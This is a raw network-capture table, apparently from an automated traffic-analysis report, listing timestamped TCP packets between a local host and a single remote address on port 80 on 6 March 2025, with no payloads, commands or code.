Mar 6, 2025 07:06:14.984050035 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.984117985 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.984117985 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.991533041 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.991586924 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.991626024 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.991648912 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.991667032 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.991681099 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.991703987 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.991743088 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.991785049 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.991797924 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.991816044 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.991827965 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.038269997 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.064941883 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.064995050 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.065088034 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.065124989 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.065161943 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.065196991 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.065237045 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.065304041 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.065304041 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.067547083 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.067603111 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.067605019 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.067641973 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.067688942 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.067699909 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.067754030 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.067791939 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.067796946 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.067848921 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.067897081 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.067899942 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.067936897 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.067987919 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.067989111 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.068042994 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.068078041 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.068084955 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.068113089 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.068162918 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.068165064 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.068200111 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.068236113 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.068242073 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.068294048 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.068339109 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.068346977 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.068399906 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.068435907 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.068444967 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.068471909 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.068506956 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.068514109 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.068542004 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.068583965 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.068617105 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.068655968 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.068691015 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.068703890 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.068742990 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.068784952 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.068799973 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.068835020 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.068872929 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.068878889 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.068926096 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.068962097 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.068973064 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.068998098 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.069040060 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.069051027 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.069084883 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.069120884 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.069125891 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.069154978 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.069201946 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.069205046 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.069236040 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.069271088 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.069282055 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.069308043 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.069350958 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.069360971 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.069395065 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.069430113 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.069441080 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.069483042 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.069524050 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.069535017 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.069569111 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.069602966 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.069612980 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.069638014 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.069684982 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.069713116 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.069747925 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.069782972 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.069792032 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.069820881 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.069856882 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.069864035 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.069940090 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.069974899 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.069988012 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.070012093 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.070048094 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.070055962 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.070082903 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.070117950 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.070131063 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.070152998 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.070188046 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.070195913 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.070223093 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.070255995 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.070264101 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.070291042 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.070326090 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.070333958 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.070362091 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.070395947 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.070405006 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.070431948 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.070468903 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.070473909 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.070503950 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.070538998 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.070549011 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.070574045 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.070609093 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.070615053 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.070638895 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.070673943 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.070682049 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.070710897 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.070751905 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.070784092 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.070821047 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.070856094 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.070864916 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.070892096 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.070928097 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.070935011 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.074697971 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.074872971 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.074908972 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.074943066 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.074944973 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.074995041 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.075143099 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.075177908 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.075212955 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.075225115 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.075251102 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.075287104 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.075294018 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.075321913 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.075357914 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.075373888 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.075395107 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.075431108 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.075438976 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.075465918 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.075500965 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.075506926 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.081777096 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.081813097 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.081846952 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.081849098 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.081898928 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.081935883 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.081989050 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.082026005 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.082032919 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.082061052 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.082094908 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.082106113 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.131951094 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.154653072 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.154687881 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.154742002 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.154771090 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.154779911 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.154814959 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.154834032 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.154854059 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.154886961 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.154911041 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.154927015 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.154978991 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.157576084 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.157607079 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.157660961 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.157660961 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.157715082 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.157764912 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.157767057 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.157799959 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.157866001 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.157896996 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.157938004 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.157977104 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.157985926 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.158029079 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.158058882 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.158087015 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.158111095 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.158163071 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.158164024 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.158198118 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.158250093 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.158260107 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.158299923 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.158334970 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.158351898 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.158404112 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.158454895 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.158456087 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.158488989 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.158543110 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.158551931 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.158576012 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.158627033 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.158627033 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.158667088 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.158745050 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.158781052 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.158801079 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.158837080 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.158869028 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.158870935 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.158924103 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.158962965 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.159014940 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.159050941 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.159060001 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.159085035 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.159118891 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.159147024 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.159169912 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.159225941 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.159228086 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.159280062 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.159328938 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.159331083 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.159364939 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.159399986 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.159409046 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.159451008 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.159486055 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.159502983 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.159537077 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.159571886 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.159579992 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.159605026 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.159640074 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.159650087 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.159676075 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.159709930 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.159720898 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.159745932 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.159780025 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.159790039 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.159815073 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.159848928 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.159856081 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.159883022 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.159921885 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.159928083 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.159956932 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.160000086 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.160006046 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.160057068 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.160092115 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.160099983 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.160125971 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.160160065 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.160168886 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.160193920 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.160228014 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.160238028 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.160262108 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.160295963 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.160309076 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.160348892 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.160382986 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.160398960 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.160417080 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.160450935 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.160463095 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.160485029 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.160518885 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.160528898 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.160554886 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.160588980 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.160598040 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.160621881 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.160655975 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.160670042 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.160689116 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.160723925 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.160732985 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.160757065 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.160789967 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.160799026 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.160825014 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.160860062 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.160866976 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.160892963 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.160928011 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.160933971 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.160962105 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.160995007 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.161021948 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.161025047 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.161058903 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.161068916 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.161132097 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.161168098 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.161175966 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.161247015 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.161281109 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.161288977 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.164489985 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.164541006 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.164552927 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.164593935 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.164628029 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.164644003 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.164681911 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.164710999 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.164747953 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.164767027 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.164804935 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.164809942 CET	49733	80	192.168.2.4	45.144.214.104
